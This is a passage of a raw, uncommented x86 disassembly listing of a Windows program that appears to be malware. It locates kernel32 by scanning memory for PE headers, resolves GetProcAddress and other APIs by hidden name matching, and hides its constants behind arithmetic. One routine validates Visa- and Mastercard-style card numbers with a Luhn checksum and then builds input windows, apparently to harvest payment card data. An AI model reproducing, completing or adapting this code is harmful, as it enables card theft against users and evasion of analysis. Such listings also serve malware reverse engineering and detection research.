add eax, 0FFFAh
sub ebx, eax
jmp short loc_420D88
; ---------------------------------------------------------------------------
loc_420DFE: ; CODE XREF: .data:00420DEC�j
mov eax, [ebp-8]
mov eax, [eax+80h]
mov [ebp-0Ch], eax
mov eax, ds:1001218Ch
dec eax
mov [ebp-4], eax
jmp loc_420FA1
; ---------------------------------------------------------------------------
loc_420E18: ; CODE XREF: .data:00420FAD�j
mov eax, ebx
add eax, [ebp-0Ch]
add eax, [ebp-4]
mov [ebp-12Ch], eax
mov edx, ds:100121A4h
cmp [eax], edx
jz loc_420FB3
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp-130h], edx
push edx
lea eax, [ebp-127h]
push eax
call sub_424F6D
mov eax, ds:100120A0h
add eax, ds:100121ACh
sub eax, 8
mov [ebp-28h], eax
jmp short loc_420E87
; ---------------------------------------------------------------------------
loc_420E65: ; CODE XREF: .data:00420EA3�j
mov eax, [ebp-28h]
mov al, [ebp+eax-127h]
cmp al, 61h
jle short loc_420E84
cmp al, 7Ah
jge short loc_420E84
mov eax, [ebp-28h]
lea eax, [ebp+eax-127h]
sub byte ptr [eax], 20h
loc_420E84: ; CODE XREF: .data:00420E71�j
; .data:00420E75�j
inc dword ptr [ebp-28h]
loc_420E87: ; CODE XREF: .data:00420E63�j
mov eax, [ebp-28h]
movsx eax, byte ptr [ebp+eax-127h]
mov edx, ds:10012094h
add edx, ds:1001211Ch
sub edx, 9
cmp eax, edx
jnz short loc_420E65
mov eax, ds:100121C0h
mov edx, eax
add edx, ds:100120B4h
cmp byte ptr [ebp+edx-132h], 4Bh
jnz loc_420F9D
mov edx, ds:10012158h
movsx ecx, word ptr ds:10012114h
add edx, ecx
cmp byte ptr [ebp+edx-128h], 45h
jnz loc_420F9D
mov edx, ds:10012124h
add edx, ds:10012140h
cmp byte ptr [ebp+edx-12Eh], 52h
jnz loc_420F9D
movsx edx, word ptr ds:10012100h
add eax, edx
cmp byte ptr [ebp+eax-12Eh], 4Ch
jnz loc_420F9D
mov eax, ds:10012138h
mov edx, ds:1001210Ch
add edx, eax
cmp byte ptr [ebp+edx-130h], 33h
jnz short loc_420F9D
cmp byte ptr [ebp+eax-128h], 32h
jnz short loc_420F9D
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+10h]
mov [ebp-138h], edx
mov eax, ds:100120A4h
movsx edx, word ptr ds:100121A8h
add eax, edx
sub eax, 2
mov [ebp-134h], eax
loc_420F57: ; CODE XREF: .data:00420F99�j
mov eax, [ebp-138h]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, ds:100120F8h
add eax, ds:1001214Ch
sub eax, 8
cmp edi, eax
jz short loc_420FB3
push edi
call sub_421013
pop ecx
cmp dword ptr ds:100121D4h, 0
jnz short loc_420FB3
movsx eax, word ptr ds:10012090h
add eax, 3
add [ebp-134h], eax
jmp short loc_420F57
; ---------------------------------------------------------------------------
db 0EBh
db 16h
; ---------------------------------------------------------------------------
loc_420F9D: ; CODE XREF: .data:00420EBA�j
; .data:00420ED7�j ...
add dword ptr [ebp-4], 14h
loc_420FA1: ; CODE XREF: .data:00420E13�j
mov eax, [ebp-8]
mov eax, [eax+84h]
cmp [ebp-4], eax
jb loc_420E18
loc_420FB3: ; CODE XREF: .data:00420E2E�j
; .data:00420F77�j ...
cmp dword ptr ds:100121D4h, 0
jz short loc_42100E
call sub_420864
call sub_422A6F
call sub_423BBE
mov edx, eax
mov [ebp-19h], dl
movzx eax, byte ptr [ebp-19h]
mov edx, ds:1001210Ch
add edx, ds:10012094h
sub edx, 0Bh
cmp eax, edx
jz short loc_42100E
lea eax, [ebp-24h]
push eax
mov eax, ds:100121C4h
sub eax, 5
push eax
lea eax, [ebp-20h]
push eax
push 10009C0Ah
mov eax, ds:100121C8h
sub eax, 2
push eax
push 0
call dword ptr ds:10011B90h
loc_42100E: ; CODE XREF: .data:00420FBA�j
; .data:00420FE5�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421013 proc near ; CODE XREF: .data:00420F7A�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21F = byte ptr -21Fh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov ecx, ds:10012188h
add ecx, 10h
shr edi, cl
movsx esi, word ptr ds:10012170h
add esi, 8
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_42103D: ; CODE XREF: sub_421013+50�j
; sub_421013+93�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_421065
movsx eax, word ptr ds:10012114h
movsx edx, word ptr ds:1001216Ch
lea eax, [eax+edx+0FFFAh]
sub ebx, eax
jmp short loc_42103D
; ---------------------------------------------------------------------------
loc_421065: ; CODE XREF: sub_421013+37�j
mov eax, ds:10012098h
add eax, 35h
add eax, ds:10012108h
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_4210A8
movsx eax, word ptr ds:10012090h
mov edx, ds:10012104h
lea eax, [eax+edx+0FFFCh]
sub ebx, eax
jmp short loc_42103D
; ---------------------------------------------------------------------------
loc_4210A8: ; CODE XREF: sub_421013+7B�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_4210CF
mov eax, ds:100121B4h
add eax, 0FFFFh
sub ebx, eax
jmp loc_42103D
; ---------------------------------------------------------------------------
loc_4210CF: ; CODE XREF: sub_421013+A9�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_424F6D
movsx eax, word ptr ds:10012154h
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_42112D
; ---------------------------------------------------------------------------
loc_42110B: ; CODE XREF: sub_421013+136�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_42112A
cmp al, 7Ah
jge short loc_42112A
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_42112A: ; CODE XREF: sub_421013+104�j
; sub_421013+108�j
inc [ebp+var_4]
loc_42112D: ; CODE XREF: sub_421013+F6�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, ds:100120E4h
add edx, ds:1001218Ch
sub edx, 3
cmp eax, edx
jnz short loc_42110B
cmp [ebp+var_103], 4Bh
jnz short loc_421181
cmp [ebp+var_102], 45h
jnz short loc_421181
cmp [ebp+var_101], 52h
jnz short loc_421181
cmp [ebp+var_FE], 4Ch
jnz short loc_421181
cmp [ebp+var_FD], 33h
jnz short loc_421181
cmp [ebp+var_FC], 32h
jz short loc_421186
loc_421181: ; CODE XREF: sub_421013+13F�j
; sub_421013+148�j ...
jmp loc_4213C3
; ---------------------------------------------------------------------------
loc_421186: ; CODE XREF: sub_421013+16C�j
mov eax, ds:10012144h
add eax, ds:100121B8h
sub eax, 8
mov [ebp+var_108], eax
jmp loc_4213AE
; ---------------------------------------------------------------------------
loc_42119F: ; CODE XREF: sub_421013+3AA�j
mov eax, [ebp+var_108]
mov ecx, ds:100121C8h
add ecx, ds:10012094h
sub ecx, 4
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_424F6D
mov eax, ds:10012144h
add eax, ds:100120A8h
cmp byte ptr [ebp+eax+var_228+1], 47h
jnz loc_4213A8
movsx eax, word ptr ds:1001216Ch
add eax, ds:1001213Ch
cmp byte ptr [ebp+eax+var_224+1], 74h
jnz loc_4213A8
mov eax, ds:100120A0h
cmp [ebp+eax+var_220], 50h
jnz loc_4213A8
mov eax, ds:10012138h
add eax, ds:10012158h
cmp byte ptr [ebp+eax+var_224+3], 63h
jnz loc_4213A8
mov eax, ds:10012160h
add eax, ds:1001212Ch
cmp byte ptr [ebp+eax+var_228+3], 41h
jnz loc_4213A8
mov eax, ds:10012120h
add eax, 4
add eax, ds:100120B8h
cmp [ebp+eax+var_21F], 72h
jnz loc_4213A8
mov eax, [ebp+var_108]
movsx ecx, word ptr ds:10012114h
movsx esi, word ptr ds:100120D0h
add ecx, esi
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
mov ecx, ds:100121CCh
add ecx, ds:1001209Ch
sub ecx, 8
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov ds:100121D4h, ebx
mov ds:1000E1F8h, edx
lea edi, [ebp+var_23D]
lea esi, ds:100122F8h
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, ds:10012305h
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, ds:1001231Ah
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, ds:10012334h
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011B90h, eax
lea eax, [ebp+var_252]
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1001165Ch, eax
lea eax, [ebp+var_26C]
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000D008h, eax
lea eax, [ebp+var_281]
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1001064Ch, eax
jmp short loc_4213C3
; ---------------------------------------------------------------------------
loc_4213A8: ; CODE XREF: sub_421013+1E8�j
; sub_421013+203�j ...
inc [ebp+var_108]
loc_4213AE: ; CODE XREF: sub_421013+187�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_42119F
loc_4213C3: ; CODE XREF: sub_421013:loc_421181�j
; sub_421013+393�j
pop edi
pop esi
pop ebx
leave
retn
sub_421013 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4213C8 proc near ; CODE XREF: sub_41B3C2+18C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, ds:100121C8h
sub eax, 2
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword ptr ds:1000E5ECh
mov edi, eax
or edi, edi
jz short loc_4213F5
xor eax, eax
jmp short loc_421422
; ---------------------------------------------------------------------------
loc_4213F5: ; CODE XREF: sub_4213C8+27�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call dword ptr ds:1000C03Ch
mov edi, eax
push [ebp+var_4]
call dword ptr ds:10011618h
or edi, edi
jz short loc_42141F
xor eax, eax
jmp short loc_421422
; ---------------------------------------------------------------------------
loc_42141F: ; CODE XREF: sub_4213C8+51�j
xor eax, eax
inc eax
loc_421422: ; CODE XREF: sub_4213C8+2B�j
; sub_4213C8+55�j
pop edi
leave
retn
sub_4213C8 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 8C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42142D proc near ; CODE XREF: sub_41E5D9+A3�p
; sub_41E5D9+DA�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_42146E
cmp al, 79h
jz short loc_42146E
cmp al, 75h
jz short loc_42146E
cmp al, 69h
jz short loc_42146E
cmp al, 6Fh
jz short loc_42146E
cmp al, 61h
jnz short loc_421472
loc_42146E: ; CODE XREF: sub_42142D+2B�j
; sub_42142D+2F�j ...
add [ebp+arg_0], 1
loc_421472: ; CODE XREF: sub_42142D+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_42147C
add [ebp+arg_0], 1
loc_42147C: ; CODE XREF: sub_42142D+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_42142D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421484 proc near ; CODE XREF: sub_41C68E+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call dword ptr ds:1000F248h
pop ebp
retn
sub_421484 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42149B proc near ; CODE XREF: sub_41F4F7+BA2�p
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2BE = byte ptr -2BEh
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10A = byte ptr -10Ah
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_FB = byte ptr -0FBh
var_F9 = byte ptr -0F9h
var_F8 = byte ptr -0F8h
var_F7 = byte ptr -0F7h
var_F6 = byte ptr -0F6h
var_F4 = byte ptr -0F4h
var_F1 = byte ptr -0F1h
var_F0 = byte ptr -0F0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_4223D4
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_4214C2
cmp al, 35h
jnz loc_4223D4
loc_4214C2: ; CODE XREF: sub_42149B+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4214CA: ; CODE XREF: sub_42149B+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4214CA
mov [ebp+var_128], eax
mov edx, ds:100120B4h
add edx, 8
cmp eax, edx
jz short loc_4214F5
mov edx, ds:100120A0h
add edx, 0Fh
cmp eax, edx
jnz loc_4223D4
loc_4214F5: ; CODE XREF: sub_42149B+47�j
mov eax, ds:100121A4h
mov ebx, eax
add ebx, ds:1001212Ch
sub ebx, 5
jmp short loc_42152B
; ---------------------------------------------------------------------------
loc_421507: ; CODE XREF: sub_42149B+9B�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:1000F370h[edx], eax
jz loc_4223D4
inc ebx
loc_42152B: ; CODE XREF: sub_42149B+6A�j
mov eax, ds:100120ACh
lea eax, [eax+eax+5Eh]
cmp ebx, eax
jb short loc_421507
movsx eax, word ptr ds:100120B0h
movsx edx, word ptr ds:10012154h
lea eax, [eax+edx+3]
cmp [ebp+var_128], eax
jnz loc_4216F7
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_421568
cmp al, 20h
jnz loc_4223D4
loc_421568: ; CODE XREF: sub_42149B+C3�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_42157A
cmp al, 20h
jnz loc_4223D4
loc_42157A: ; CODE XREF: sub_42149B+D5�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_42158C
cmp al, 20h
jnz loc_4223D4
loc_42158C: ; CODE XREF: sub_42149B+E7�j
mov eax, ds:10012144h
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
movsx eax, word ptr ds:1001219Ch
mov edx, eax
add edx, eax
mov eax, [ebp+arg_0]
mov al, [eax+1]
mov [ebp+edx+var_10A], al
mov eax, ds:100121C4h
add eax, ds:100120E4h
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_104], dl
mov eax, ds:1001209Ch
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_104], dl
mov eax, ds:10012198h
add eax, ds:100121B4h
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_104], dl
mov eax, ds:100120B8h
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_FE], dl
mov eax, ds:100121B0h
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov [ebp+eax+var_F9], dl
mov eax, ds:100121C0h
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_FB], dl
movsx eax, word ptr ds:10012194h
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_F7], dl
mov eax, ds:10012120h
add eax, 3
movsx edx, word ptr ds:10012110h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:10012168h
movsx edx, word ptr ds:100120B0h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_105], dl
mov eax, ds:100121A4h
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_F4], dl
mov eax, ds:1001211Ch
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_F6], dl
movsx eax, word ptr ds:10012110h
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_F6], dl
mov eax, ds:10012158h
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_F1], dl
mov eax, ds:10012138h
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_F8], dl
movsx eax, word ptr ds:10012090h
mov edx, ds:100121C4h
add edx, ds:100120ECh
sub edx, 0Ah
mov [ebp+eax+var_F0], dl
jmp short loc_421706
; ---------------------------------------------------------------------------
loc_4216F7: ; CODE XREF: sub_42149B+B5�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_424F6D
loc_421706: ; CODE XREF: sub_42149B+25A�j
movsx esi, word ptr ds:100120DCh
sub esi, 6
jmp short loc_421727
; ---------------------------------------------------------------------------
loc_421712: ; CODE XREF: sub_42149B+29C�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_421721
cmp al, 39h
jle short loc_421726
loc_421721: ; CODE XREF: sub_42149B+280�j
jmp loc_4223D4
; ---------------------------------------------------------------------------
loc_421726: ; CODE XREF: sub_42149B+284�j
inc esi
loc_421727: ; CODE XREF: sub_42149B+275�j
mov eax, ds:100121C0h
add eax, 0Bh
add eax, ds:100120F8h
cmp esi, eax
jb short loc_421712
mov eax, ds:100120E4h
add eax, ds:10012164h
sub eax, 2
mov [ebp-108h], eax
mov esi, ds:1001212Ch
sub esi, 5
jmp short loc_42179E
; ---------------------------------------------------------------------------
loc_421758: ; CODE XREF: sub_42149B+313�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word ptr ds:100120DCh
add edx, ds:100120A8h
sub edx, 7
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_421792
mov eax, ds:1001209Ch
inc eax
sub [ebp-108h], eax
loc_421792: ; CODE XREF: sub_42149B+2E9�j
movsx eax, word ptr ds:10012110h
sub eax, 2
add esi, eax
loc_42179E: ; CODE XREF: sub_42149B+2BB�j
mov eax, ds:10012190h
add eax, 0Ch
add eax, ds:10012124h
cmp esi, eax
jb short loc_421758
movsx eax, word ptr ds:10012168h
mov ebx, eax
add ebx, ds:10012118h
sub ebx, 8
jmp short loc_4217E1
; ---------------------------------------------------------------------------
loc_4217C4: ; CODE XREF: sub_42149B+350�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
movsx eax, word ptr ds:100121BCh
sub eax, 4
add ebx, eax
loc_4217E1: ; CODE XREF: sub_42149B+327�j
mov eax, ds:1001212Ch
add eax, 0Bh
cmp ebx, eax
jb short loc_4217C4
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
movsx edi, word ptr ds:100121A8h
add edi, ds:10012108h
cmp edx, edi
jnz loc_4223D4
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:10011774h
pop ecx
or eax, eax
jnz loc_4223D4
mov eax, ds:100120C0h
movsx edx, word ptr ds:10012154h
mov esi, eax
add esi, edx
sub esi, 9
mov esi, ds:10012190h
sub esi, 3
jmp short loc_42185D
; ---------------------------------------------------------------------------
loc_421845: ; CODE XREF: sub_42149B+3D5�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp dword ptr ds:1000F370h[eax], 0
jz short loc_421872
inc esi
loc_42185D: ; CODE XREF: sub_42149B+3A8�j
mov eax, ds:10012174h
add eax, 5Bh
movsx edx, word ptr ds:100121A8h
add eax, edx
cmp esi, eax
jb short loc_421845
loc_421872: ; CODE XREF: sub_42149B+3BF�j
mov eax, ds:1001213Ch
add eax, 62h
cmp esi, eax
jz loc_4223D4
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:1000F370h[edx], eax
push 10012EFEh
call sub_4228CE
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call dword ptr ds:10011638h
mov [ebp+var_134], eax
test eax, eax
jnz short loc_4218CB
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_4218CB: ; CODE XREF: sub_42149B+425�j
push 10012EF1h
call sub_4228CE
push eax
push [ebp+var_134]
call sub_41DBFE
mov [ebp+var_12C], eax
push 10012EE8h
push eax
call sub_41DBFE
add esp, 14h
mov [ebp+var_26C], eax
mov eax, 30h
mul esi
mov [ebp+var_270], eax
mov edi, [ebp+var_26C]
mov ebx, eax
mov ds:1000F374h[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_274], eax
push dword ptr ds:1000F374h[eax]
call dword ptr ds:10011658h
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call dword ptr ds:10011650h
push 0
call dword ptr ds:1000E5E8h
mov [ebp-10Ch], eax
push 0
push eax
push 0
push [ebp+var_12C]
mov eax, [ebp+var_110]
sub eax, [ebp+var_118]
push eax
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
push eax
mov eax, ds:100120FCh
add eax, ds:100121B4h
sub eax, 8
push eax
mov eax, ds:10012124h
dec eax
push eax
push 50800000h
lea eax, [ebp+var_FF]
push eax
push 10012EE1h
push 200h
call dword ptr ds:10010648h
mov [ebp+var_278], eax
mov eax, 30h
mul esi
mov [ebp+var_27C], eax
mov edi, [ebp+var_278]
mov ebx, eax
mov ds:1000F378h[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
mov ebx, ds:100120CCh
add ebx, 0F9h
sub edi, ebx
mov ebx, ds:10012124h
add ebx, 34h
add ebx, ds:1001210Ch
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, ds:100120F0h
movsx edx, word ptr ds:100120DCh
add eax, edx
sub eax, 0Ah
cmp [ebp+var_124], eax
jge short loc_421A32
mov eax, ds:1001214Ch
sub eax, 5
mov [ebp+var_124], eax
loc_421A32: ; CODE XREF: sub_42149B+587�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word ptr ds:100120D8h
add edx, 28h
sub eax, edx
mov [ebp+var_120], eax
push 10012ED7h
call sub_4228CE
mov [ebp+var_280], eax
push 10012EBEh
call sub_4228CE
mov [ebp+var_284], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_288], eax
mov edi, eax
push dword ptr ds:1000F378h[edi]
mov edi, ds:1001214Ch
add edi, 36h
push edi
push [ebp+var_120]
push [ebp+var_124]
mov edi, ds:100120C0h
add edi, 13h
add edi, ds:10012130h
push edi
push 50800000h
mov edi, [ebp+var_284]
push edi
mov edi, [ebp+var_280]
push edi
movsx edi, word ptr ds:10012194h
add edi, ds:100120F8h
sub edi, 2
push edi
call dword ptr ds:10010648h
mov [ebp+var_138], eax
push 10012EB4h
call sub_4228CE
mov [ebp+var_28C], eax
push 10012EB0h
call sub_4228CE
add esp, 10h
mov [ebp+var_290], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov edi, eax
push dword ptr ds:1000F378h[edi]
movsx edi, word ptr ds:100120E0h
mov ebx, ds:1001215Ch
lea edi, [edi+ebx+0F6h]
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, ds:1001212Ch
add ebx, 30h
movsx edx, word ptr ds:100120C8h
add ebx, edx
add edi, ebx
mov ebx, ds:10012130h
inc ebx
add edi, ebx
push edi
movsx edi, word ptr ds:10012194h
add edi, 14h
push edi
push 50800009h
mov edi, [ebp+var_290]
push edi
mov edi, [ebp+var_28C]
push edi
mov edi, ds:100120B4h
add edi, ds:100121B4h
sub edi, 9
push edi
call dword ptr ds:10010648h
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:100121B4h
dec eax
push eax
mov eax, ds:10012118h
add eax, ds:10012174h
sub eax, 0Ah
push eax
mov eax, ds:100120B8h
movsx edx, word ptr ds:100120E8h
add eax, edx
sub eax, 9
push eax
push 2BCh
mov eax, ds:1001217Ch
movsx edx, word ptr ds:10012128h
add eax, edx
sub eax, 6
push eax
mov eax, ds:1001210Ch
add eax, ds:10012178h
sub eax, 0Ah
push eax
movsx eax, word ptr ds:1001216Ch
add eax, 4
push eax
mov eax, ds:10012164h
add eax, 10h
add eax, ds:100120A0h
push eax
call dword ptr ds:1000F250h
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call dword ptr ds:1000C014h
push 0
push dword ptr [ebp-10Ch]
push 0
push [ebp+var_13C]
mov eax, ds:100120F0h
add eax, 0EDh
add eax, ds:10012174h
movsx edx, word ptr ds:10012168h
sub edx, 4
sub eax, edx
push eax
mov eax, [ebp+var_120]
mov edx, ds:100121B8h
movsx ecx, word ptr ds:100120BCh
add edx, ecx
sub edx, 8
sub eax, edx
push eax
movsx eax, word ptr ds:100121BCh
add eax, ds:1001211Ch
sub eax, 8
push eax
mov eax, ds:100120ECh
sub eax, 4
push eax
push 50000000h
push 10012EA7h
push 10012EA9h
mov eax, ds:100120B4h
sub eax, 8
push eax
call dword ptr ds:10010648h
mov [ebp+var_298], eax
